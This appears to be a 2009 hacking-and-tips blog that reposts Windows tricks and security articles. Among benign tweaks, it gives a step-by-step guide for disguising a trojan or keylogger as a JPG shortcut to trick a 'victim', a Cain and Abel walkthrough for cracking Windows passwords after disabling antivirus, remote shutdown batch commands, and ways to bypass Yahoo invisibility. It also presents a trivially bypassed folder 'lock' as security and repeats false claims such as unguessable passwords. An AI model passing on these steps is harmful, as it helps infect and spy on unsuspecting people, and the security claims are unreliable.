Tuesday, March 31, 2009

Hide Entire Drives Partition Without Registry

Here is a cool technique which hides entire hard disk drives by a simple procedure.
This is the best security tip to be employ against unauthorised users.

1) Go to Start > Run > type "diskpart". A DOS window will appear with following description.

DISKPART>

2) Then type "list volume" The result will look something like one as shown below-

3) Suppose you want to hide drive E then type "select volume 3"

Then a message will appear in same window { Volume 3 is the selected volume}

4) Now type "remove letter E"

Now a message will come { Diskpart Removed the Drive letter }

sometime it requires to reboot the computer.

Diskpart will remove the letter.

Windows XP is not having capabilty to identify the unknown volume.

Your Data is now safe from unauthorised users.

To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".

It means type "assign letter E".

 

Source:- http://www.insecure.in/hide_drive_trick.asp

Running Multiple Instances of Yahoo Messenger

If you are using Yahoo! Messenger v8.0 or above, YahooMulti.reg will let you run multiple copies of Yahoo Messenger.

At the same time which will allow you to login multiple ID’s at the same time.

1) Open Registry Editor (regedit.exe)

Click Start > Run and then type 'regedit' press enter.

2) Then Look For- HKEY_CURRENT_ USER\Software\yahoo\ pager\Test.

3) Then change this value of plural to like this- “Plural”=dword: 00000001

Source:- http://www.insecure.in/multiple_yahoo_trick.asp

Hide EXE File into JPG

This is a good trick to hide your exe files into a jpg file..!
How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whateve you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-

'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-

%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.

This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Source:- http://www.insecure.in/hide_exe_jpg.asp

Increase Broadband Speed Using Simple Tweak

 
A Simple Tweak (XP Pro only) which will increase your Broadband Speed.
Make sure you Log on as Administrator, not as a user with Administrator privileges.
Follow the steps as given below-
1) Click on Start Button.
2) Select Run From Start Menu.
3) Type gpedit.msc
4) Expand the [Administrative Templates] branch.
5) Then Expand the [Network] branch.
6) Highlight(Select by Single Click) [QoS Packet Scheduler]
7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)
8) Check(Select By Single Click on it) [Enabled]
9) Change [Bandwidth limit %] to 0 %
10) Click [OK] Button.
11) Restart Your PC.
12) Now Check Your Broadband Speed.

 

Source:- http://www.insecure.in/broadband_trick.asp

Create Folders And Files With NO! Name

This trick will allow you to create files and folders without any name.
Just follow the steps as given below :-
1) Select any file or folder.
2) Right click on it, select 'Rename' or simply press 'F2'.
3) Press and hold the 'Alt' key. While holding the Alt key, type numbers '0160' from the numpad.
Note :- Type the numbers '0160' from the numpad, that is, the numbers present on the right side of the keyboard.
Don’t type the numbers which are present on top of the character keys.
4) Press Enter and the nameless file or folder will be created.
Reason :- The file or folder that seems nameless is actually named with a single space.
But what if you want to create another nameless file or folder in the same directory ?
For this you will have to rename the file with 2 spaces.
Just follow the steps given below :-
1) Select file, Press 'F2'.
2) Hold 'Alt' key and type '0160' from the numpad.
3) Release the 'Alt' key. Now without doing anything else, again hold 'Alt' key and type '0160'.
4) Press 'Enter' and you will have second nameless file in the same directory.
5) Repeat step 3 to create as many nameless files or folders in the same directory.
(We have a problem with deleting these folders, to do so, start your computer in 'Safe Mode' and delete it from there.)

 

Source:- http://www.insecure.in/noname_trick.asp

Chat with Friends through ms dos Command Prompt

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

8) Now all you need to do is type your message and press Enter.
Start Chatting.......!

Source:- http://www.insecure.in/cmd_chat_trick.asp

Run Firefox inside Firefox

How to run Firefox inside Firefox.?
Yup you can run Firefox inside Firefox just by typing following url.
How about Opening Firefox inside Firefox which is again in another Firefox..?
Not bad huh?
And its really easy too just type in this url in Firefox's address bar and there you go!
Firefox inside Firefox!
copy paste following url in a web browser (mozilla Firefox).

chrome://browser/content/browser.xul

Following is the screenshot of this trick (firefox in firefox in Firefox, which is again in another firefox)-

firefox inside firefox

 

Source:- http://www.insecure.in/firefox_in_firefox.asp

Reveal *****(Asterisk) Passwords Using Javascript

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);

4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

Note :- This trick may not be working with firefox.

 

Source:- http://www.insecure.in/reveal_pass_trick.asp

Calculations On Command Prompt

The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:

C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7

Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.

For more information, type set /? at the command prompt.

 

Source:- http://www.insecure.in/cal_cmd_trick.asp

Folder Lock Without Any Software

Folder Lock With Password Without Any Software-
Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').

Any name will do.

Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.

Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.

If you want to unlock your files,double click the batch file again and you would be prompted for password.

Enter the password and enjoy access to the folder.

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM

echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

 

Source:- http://www.insecure.in/folder_lock_trick.asp

Shutdown Command Via Command Prompt

The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.

To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.

In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.

You have to use at least one switch for the shutdown command to work.
The Switches :-

The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.

-i: Display GUI interface, must be the first option
-l: Log off (cannot be used with -m option)
-s: Shutdown the computer
-r: Shutdown and restart the computer
-a: Abort a system shutdown
-m \\computername: Remote computer to shutdown/restart/abort
-t xx: Set timeout for shutdown to xx seconds
-c “comment”: Shutdown comment (maximum of 127 characters)
-f: Forces running applications to close without warning
-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)

Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
If you are having trouble try using a '/' in place of '-' in your switches.

Examples :-
shutdown –m \\computername –r –f

This command will restart the computer named computername and force any programs that might still be running to stop.

shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120

This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.

shutdown –m \\computername –a
This command will abort a previous shutdown command that is in progress.

Using A Batch File :-
You can create a file that performs the shutdown command on many computers at one time.

In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.

Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.

Make sure each shutdown command is on its own line.

An example of what should be typed in notepad is given below-

shutdown –m \\computer1 –s
shutdown –m \\computer2 –s
shutdown –m \\computer3 –s

Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.

Pick the location to save the batch file in and save it.
When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.
You can use any combination of shutdown commands in a batch file.

Source:- http://www.insecure.in/shutdown_cmd_trick.asp

The Ethical Hacker

Welcome to the unique confluence of hackers , crackers and security professionals on the world wide web.


This is your complete resource for internet security and ethical hacking.


 -: The Ethical Hacker :-hack
Most people think that hackers are computer criminals.
They fail to recognize the fact that criminals and hackers are two totally different things.
Media is responsible for this.
Hackers in reality are actually good and extremely intelligent people who by using their knowledge in a constructive manner help organizations, companies, government, etc. to secure documents and secret information on the internet.

Source:- http://www.insecure.in/

Windows-XP Password Cracking

Here we use the tool "Cain and Abel" for cracking passwords of any local user/administrator.


First download cain and abel from "http://www.oxid.it/cain.html" and install it on your system.


Make sure that you have disabled the antivirus/firewall running on your system before installing and throughout this process.


Two most effective techniques used here are "Brute-Force" and "Cryptanalysis".
Brute-Force:- As this techniques takes more time to complete, the attacker prefer this technique only when there is a hope that the password contain same type of characters or may be two. i.e only loweralpha, only alpha, only numeric or may be loweralpha-numeric, also it should contain less than 7 characters. Otherwise it takes more time to crack password, which may be the mixture of all types of characters along with special symbols.


The step-by-step explaination for this technique is given below-


1) Open the tool "Cain and Abel"  

2) Go into the category "Cracker"      it displays all sub-categories under "Cracker" in left panel.

3) Select "LM & NTLM Hashes" from left panel and then click on      symbol, you will be greeted by a window as shown.

4) Check "import hashes from local system" and then click "Next". This shows all the active accounts on local system like administrator, guest, etc. along with LM and NT hashed values of their respective passwords, as shown below.

5) Right clicking on any username shows all available options using which we can crack it's password.

6) Here we select "Brute-Force Attack" and then "NTLM Hashes", since windows uses NTLM hashes to store local users' passwords.
7) You will be greeted by a window where you can modify properties for brute-force attack such as password length, character set, etc.

8) Click on "Start" button.
9) On completion it will reveal the exact password.

 

Cryptanalisys :- Basically, Cryptanalisys means Operations performed in converting encrypted messages to plain text without initial knowledge of the crypto-algorithm and/or key employed in the encryption.


This is the fastest technique of password cracking possible due to "Rainbow Tables".


A rainbow table is a file that is used to lookup an unknown plaintext from a known hash for an algorithm that does not usually permit this operation.


Steps 1 to 4 i.e upto importing hashes from local system, are similar to previous technique (i.e brute-force). The steps coming after that are as follows-


5) Here, select "cryptanalisys attack" then "NTLM hashes" and then select "via rainbow tables". Here we can choose either OphCrack or RainbowCrack formats of tables. The rainbow tables are available free to download on internet.


Due to large file size of rainbow tables (350MB - 3GB); instead of downloading we can also create at own just by downloading rainbow table generator (winrtgen.zip of 181KB) free download at "http://www.oxid.it/downloads/winrtgen.zip"

6) Click on "Add Table"

7) Browse for the location of rainbow table on your system, select proper table and click "open".

8) Select the loaded table and then click on "Start" button.

9) On completetion it will show the exact password.


To learn windows password cracking techniques properly, one must understand "LM" & "NTLM" algorithms, SAM File, Dumping NTLM hashes from local SAM, Rainbow Tables, etc.......!

Source:- http://www.insecure.in/winxp_passcrack.asp

Password Hacking

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.


Most passwords can be cracked by using following techniques :


1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.


Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.


A password containing both uppercase &  lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

Check Your Password Strength

3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.


Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.


Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.


Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

 

Source:- http://www.insecure.in/password_hacking.asp

Network Hacking

Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.


It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.


Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.


To ping a particular host the syntax is (at command prompt)--

c:/>ping hostname.com

example:- c:/>ping www.google.com

Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.


Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It's syntax is (at command prompt)--

c:/>netstat -n

Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--

c:/>telnet hostname.com

By default telnet connects to port 23 of remote computer.
So, the complete syntax is-

c:/>telnet www.hostname.com port

example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21


Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It's syntax is (at command prompt)--

c:/>tracert www.hostname.com

example:- c:/>tracert www.insecure.in

Here "*    *    *    Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address.
various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.
The information obtained by using tracert command can be further used to find out exact operating system running on target system.

 

Source:- http://www.insecure.in/network_hacking.asp

Increase Virtual RAM - To Make Your System Faster

Follow the steps given below :-
1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.
2) Click on the 'Advanced' tab.
3) Under 'Performance', click 'Settings'.
4) Then click the 'Advanced' tab on the button that pops up.
5) Under 'Virtual Memory' at the bottom, click 'Change'.
6) Click the 'Custom Size' button.
7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).
8) Click 'Set', and then exit out of all of the windows.
9) Finally, Restart your computer.
10) You now have a faster computer and 1-2GB of Virtual RAM..!

Article Source:- http://www.insecure.in/system_faster_trick.asp

Wednesday, March 11, 2009

Yahoo Messenger User Status Checking Ways Yahoo Invisible User Detection

Many people now days prefer to stay offline while using Yahoo Messenger so how to find Status of someone?

Yahoo Messenger

There are many ways of finding people who are online but yet invisible.I'm going to describe many of those methods by this post As all we knows that Yahoo has a Stealth settings feature that lets you choose the people who see you as online and offline (Invisible Mode). But may be you want to figure out these peoples really online or offline.

There are few methods for check user stats in yahoo messenger.I'm going to discuses them one by one: Doodle IMvironment Method Double Click on the user whose status you want to check.

Message window will open. Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.

After loading the Doodle IMVironment, there will be two possibilities.


  • If the user is off line, the Doodle area will show “waiting for your friend to load Doodle” continuously.
  • If the user is online (in invisible mode), after few seconds (it can take up to one minute, depending on connection speed), you will get a blank page. So the user is online!
k by that you can find out user is offline or invisible.
BuddySpy Method:
Buddy Spy is a program for Yahoo Messenger status checking. Buddy Spy you can bypass Yahoo Messenger's Invisible Settings and check user stats for you. With its quick and intuitive interface Buddy Spy offers you the ability to see if your friend is truly online or if they are invisible. Buddy Spy offer you online checking, but it will also tell you whether your friend is in a Chat Room or even if their Web Cam is online, isn't it great ?
Download it from here BuddySpy
Using online Free tools:
I always use like this kind of tools if they available because they are easy to use and no need to install to my pc. Also with those sites we can secure our privacy because when we doing this we do connect through the site.
These are great sites I found that we can use to find peoples in yahoo messenger invisible mode.
  1. Open invisible-scanner
  2. Open Invisiable Net
  3. Open myspytool com

Convert a FAT volume or a FAT32 volume to NTFS Fomat

This tutorial will show you how to convert FAT or FAT32 Volume to NTFS Format

Convert a FAT volume or a FAT32 volume to NTFS Fomat

Please Note:
Backup your any important data before doing this we highly recommend to do so because
there is a chance to corruption or data loss during the conversion is minimal, So we recommend that you perform a backup of the data on the volume that you want to convert before you start the conversion.
Now I'm going to show you how to convert Fat , Fat32 to NTFS format by 5 steps:

  • First Click "Start" , Then "All Programs", "Accessories", and then click "Command Prompt".
  • At the command prompt, type the following, drive letter is the drive that you want to convert:
convert drive letter: /fs:ntfs
Ex: convert d:/fs:ntfs
If the operating system is on the drive that you are converting, you will be prompted to schedule the task when you restart the computer because the conversion cannot be completed while the operating system is running. When you are prompted, click "YES".
  • When you receive the following message at the command prompt, type the volume label of the drive that you are converting, and then press ENTER:
The type of the file system is FAT.
Enter the current volume label for drive drive letter
  • When the conversion to NTFS is complete, you receive the following message at the command prompt:
Conversion complete
  • Quit the command prompt and you're done!
  • Article Source: http://tutorial-net.blogspot.com/2008_05_03_archive.html

Computer Firewall, Why you need to have Firewall System to Your Computer

Your home Internet connection leaves you vulnerable to hackers who want to access your financial and personal information.

why need to have firewall in computer

hackers can send malicious viruses and worms, blackening to your computer. Intruders have the power to destroy your operating system or gather you data. How can you lock that computer to hackers but still have the freedom to do your business online?

A solid firewall help you to stop intruders from accessing to your computer. You keep your Internet link to the outside world but the outside world can't view you unless you want allow to them. With a firewall in place you will still have typical email access, but chat and other interactive programs will require to have your permission to access before you can use them. A firewall is powerful and unobtrusive.

The path to your computer data has two doorways. Some of your data is stored on a physical media storage device- such as a hard drive, optical disk, thumb drive, or some other. The other method is your computer memory. If you open either of these storage methods leaves your network and your data vulnerable.
Now I'm going to show you some methods that hackers use to hack in to your system and you can avoid like these effort from hackers using firewall system in your computer:

  • Method 01:IP spoofing

This attack occurs when someone outside your network fool your computer into recognizing the intruder as a trusted source-either a trusted internal source ( using an IP address that is within the range of IP addresses in your network) or a trusted external IP address that your system recognizes.

IP spoofing only can lunch when a hacker get your IP address. The hacker then modifies the packet headers on his communications to your computer. A packet header is present in any transfer of computer data and is similar to a routing number on a check-the header guides the packet of data on its journey just as a routing number guides a check.

  • Method 02:Network Packet Sniffing.
Windows NT sends network packets as unprotected clear text, inadvertently allowing anyone to pick packets up en route for a closer look. Even though some packet sniffers are legitimate (for network management) others are used to steal your information while in transit. This method is a easiest way for attack some ones information.So many of hackers use it to achieve their hacking.
  • Method 03:Man in the Middle
When someone accesses information between two individuals without either one detecting the infiltrator's presence. If both parties are using a public-key system to send data, the man in the middle can intercept the public key, and use it to steal your data.
  • Method 04:Distribution of Sensitive Internal Information to External Sources
This attack could involve a disgruntled employee or someone who has or once had access to sensitive corporate information of theirs. The individual could place the sensitive data on an external computer so others can use it to have full access.
  • Method 05:Password Attacks

Once someone has access to your user name and password, the attackers will then have the key to personal information. There are several ways an attacker can attack to your password. Some of them are Password Guessing , Brute Force and Password Cracking.

1) Password Guessing Method
Attackers can either enter guesses password and user names manually or electronically.If you use very common user and pass then this attack method is easy to hackers.

2) Brute-Force Login Method
This is also way password guessing, however, hackers use some tools to brute force your login.

3) Password Cracking Method
This attack lunch using Password Cracking software obtains the password file in Windows and after getting pass file then they use password decrypting tool to get your password.

Article Source: http://tutorial-net.blogspot.com/2008_05_03_archive.html#

Antivirus2009 - How to Remove Antivirus2009 Easily and Safely

If you are reading this article then your computer must be infected by Antivirus2009. Antivirus2009, Antivirus2008 and XP antivirus are categorized as rogue anti-spyware. They are very complicated viruses. What you see in your computer will be pop ups and annoying redirection when you are browsing. But did you know that they can also reveal your personal information, steal your credit card number and use it? Yes they can! Do not panic I will show you how to remove them quickly and safely now.

The first thing that you should do now is to go to my recommended sites and get a free scan there. You can use the free scan without registering or paying. I highly recommend you to do this before it is too late for you and your computer. What are those sites that I recommend? Those are sites of best anti-spyware which I used myself when my PC was infected by Antivirus2009. Now my PC is clean and error free. I am sure these sites will help you too.

How to prevent Antivirus2009 from entering your PC?

  • antivirusWhen you download something from P2P network, be sure to scan it first, cause they might be infected by Antivirus2009 or other malicious spyware.
  • Shareware and Freeware are Free for a surprising reason, they usually are bundled with spyware and malware. Be very careful.
  • Be careful when you are browsing the internet. When you visit an infected site your computer will be at risk.

To remove the risks you need a top notch anti spyware. It will provide your computer real time protection from spyware and other malware. So you can browse the internet without worry. I have tested many anti-spyware and listed the best for you. I hope this can save you a lot of trouble.

Get your totally free scan here. These anti-spyware are award winning programs with certification from many third party consumer watchdogs. Join millions of satisfied users and free your computer from malicious software now.

Article Source: http://EzineArticles.com/?expert=Daly_Coleman

What is Hacking?

What is your definition of hacking? Most people think of the news stories that relate to big companies having embarrassing problems as their data is compromised. But in truth, hacking goes a lot further than this.

It doesn't always have to be someone you don't know who hacks into your systems and causes problems for your business. It could equally be someone who works for you that doesn't have your best interests at heart. This is because the basic meaning of hacking is when someone accesses some or all of your computer systems without permission. And it doesn't just happen over the internet.

hackingisnotacrime_web_hacking_is_not_a_crime        snin33l

Quite often, many people don't see how widespread computer hacking can be. Assuming that they are only in danger from internet based attacks means they may not be covered for all risks. Even those companies that do all they can to prevent hacking which occurs online may have unwittingly turned a blind eye to other dangers.

This is why an understanding of what hacking is and what it involves can help you to protect your own business more fully. But what do you do if you don't know all the ins and outs of the threats posed?

The easiest solution is to rely on an expert to make sure every potential hole is plugged, and no one can break into your systems. Network penetration testing is one of the best ways to see how good your computer network really is. If you do have vulnerabilities it's best to find out via someone who is honest and is looking for them to benefit you. If you assume everything is okay and it isn't, you could be in for a nasty shock at some point in the future.

It is probably because people limit their definition of hacking that some businesses are more in danger than they realize. Everyone likes to think that all their employees are working honestly and for the company's good, but it doesn't always pan out that way.

Supposing an employee was given notice to leave but they had until the end of the day to clear their desk. They could potentially do a lot of damage to your computer system before they left, if the mood took them that way. Even though you could have them arrested for their actions, the damage would still be done and it would take time to rectify.

An expert in the field of ethical hacking would be able to highlight any potential problems and solve them before anyone else had a chance to exploit them. And that is certainly a service that is worth paying for.

Don't make the mistake of thinking this should only be done once though. Hackers are constantly finding new ways into previously secure systems. If you employ a company to see how up to date your security measures really are, make sure you do it on a regular basis. If you don't, you still run the risk of being caught out.

Pure Hacking helps protect your Internet security by providing world-class penetration testing and ethical hacking risk management services. For a free consultation, please visit Ethical Hacking.

Article Source: http://EzineArticles.com/?expert=Rob_McAdam

Tuesday, March 10, 2009

Computer Firewalls

A firewall is a computer software that provides protection from hacking attempts from the Internet. It is very important to install a suitable firewall software to protect the computer from spyware and virus infections. A large number of security companies have developed firewall software. Some of these software are free for personal use.

A firewall software is basically a "packet sniffer". Data that gets transferred via the Internet moves in the form of packets. The firewall software intercepts these packets, analyzes its contents and determines if it is harmful to the computer. If the packet contains malicious content, the firewall blocks it from accessing code on the computer, thus preventing damage to the computer.

Most spyware, malware and virus programs can be prevented by installing a suitable firewall. Firewalls can also prevent software from accessing the Internet and transmitting information without the user's knowledge. Thus even if a virus program gets installed on the computer, it still won't be able to access the Internet and transmit sensitive information like credit card numbers, etc.

The latest version of Microsoft Windows i.e. Windows Vista has an inbuilt firewall in it. This means if you are using Vista, you don't have to download and install additional firewall software. However, if you still want to install a third party firewall, you can do that for added protection.

For maximum protection, it is advisable to invest in an "Internet Security Suite". This is a software bundle that combines a virus scanner, email scanner, spyware protection and a firewall. By installing such software, you can get complete protection from all sorts of malware programs that spread via the Internet.

More information: Free spyware removal

Article Source: http://EzineArticles.com/?expert=John_Browning

My Email is Missing - What Happened?

Let me tell you about my own experience with disappearing email. After rebooting my computer one day I went into my email program and discovered that all of the existing email folders, Inbox, Sent Items, Deleted Items, and other local folders I had created had just disappeared. I suspected that I may have downloaded some software which had caused the problem.

    

You see, I was trying to protect my system from spy ware infiltration and so I had downloaded one of the more popular "freeware" solutions, a certain "anniversary" version, to ensure my system was protected. I had been using the same program for a long time, but one of the "automatic update" processes prompted me to upgrade to the newest free version.

Assuming the software to be safe, I downloaded the upgraded version and installed it on my PC. Within a day or two I had the major problem with my e-mail program, somehow the local files containing emails from the Inbox, Sent Items, etc. were all wiped clean! Not only that, but my email program was no longer configured to connect to my internet service provider's POP server. I also noticed that my web browser home page was changed to the default!

Fortunately I'm somewhat of a computer geek and I was able to recover most of my missing emails (after a lot of work and research!), but after a couple more reboots it happened again!

Since the only thing that had changed about the PC was this "upgraded" anti spy ware software, I immediately uninstalled it and decided to buy some anti spy ware software instead. I'm sure glad I did, the new program discovered some things on my PC that had gone undetected by the other program. I haven't experienced an email loss or browser page alteration ever since! While this may or may not be the cause of disappearing emails on your system, you should consider what new software you may have recently downloaded from the internet as one of the possible causes.

JMDC has been a programmer for over 4 years, specializing in web-based applications. To avoid the hassle of having your email disappear, make sure you're running the right anti spyware by visiting Premier Antispyware for more information. If you'd like to know more about better spy ware software, click here.

Article Source: http://EzineArticles.com/?expert=Chuck_Ronson

Do You Have a Virus? Basics of Virus Removal

If you have a virus your doctor probably prescribed an antibiotic for you. It is too bad the same cannot be applied to a computer. A computer virus attacks at many levels. It moves throughout your system and can be difficult to eradicate. In advanced cases it can get into the root area and prevent your system from booting up. If this happens you may have to format ( erase ) your hard drive and reinstall the operating system. This is time consuming and unnecessary if you have the proper protection. The regular user will find it beyond their ability to do this and will contemplate taking their computer to a repair shop. Don't do it! Until you read this! I will help you to try to do this on your own. If you are still unable to fix the problem yourself I implore you to find an alternative to a computer repair shop. If you know a friend or family member that knows a little about computers they can probably do it.

First of all you need a good antivirus program. See my site for recommendations. An antivirus program can protect you, but if you are already infected please read on. You will run the program and it will find a virus and you think GREAT! This was easy. Not so fast! People write these nasty things to avoid removal. The virus will duplicate, replicate, and move around to avoid discovery and removal. You have to attack the virus just like it attacked you.

What I am going to tell you now you must consider carefully. If you have a backup program, use it. Remember most backup programs will only restore your computer to a predetermined state which means that your computer will 'go back in time' and will not retain any additions such as updates to programs, drivers, files (pictures and anything else you have saved since.), or anything else. I do encourage active use of a backup program for many reasons. ( What if your hard drive fails? ).

